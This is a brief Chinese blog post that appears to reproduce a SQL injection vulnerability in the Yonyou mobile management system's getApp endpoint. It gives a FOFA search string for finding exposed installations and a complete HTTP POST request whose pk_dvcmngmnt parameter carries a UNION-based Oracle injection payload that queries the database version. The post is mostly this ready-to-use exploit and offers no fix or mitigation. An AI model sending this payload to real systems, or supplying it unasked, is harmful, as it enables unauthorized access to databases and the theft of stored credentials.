Babing
Published on 2024-08-30 / 1 Visits
0
0

Y19-1用友-移动管理系统-SQL

Y19-1用友-移动管理系统-SQL

漏洞描述:

用友移动管理系统 getApp 功能点未对用户的输入进行过滤,导致存在SQL注入漏洞,利用此漏洞攻击者可以获取数据库敏感信息及凭证,使系统处于极度不安全状态。

网站图片:

image-20240624081658942

网络测绘:

fofa语法:

FOFA:app=“用友-移动系统管理”

漏洞复现:

payload:

POST /mobsm/common//appManage/getApp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

pk_dvcmngmnt=0' union select banner,'test+SQLi',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from sys.v_$version where rownum=1--+

效果图:
查询数据库版本
image-20240624081729061


Comment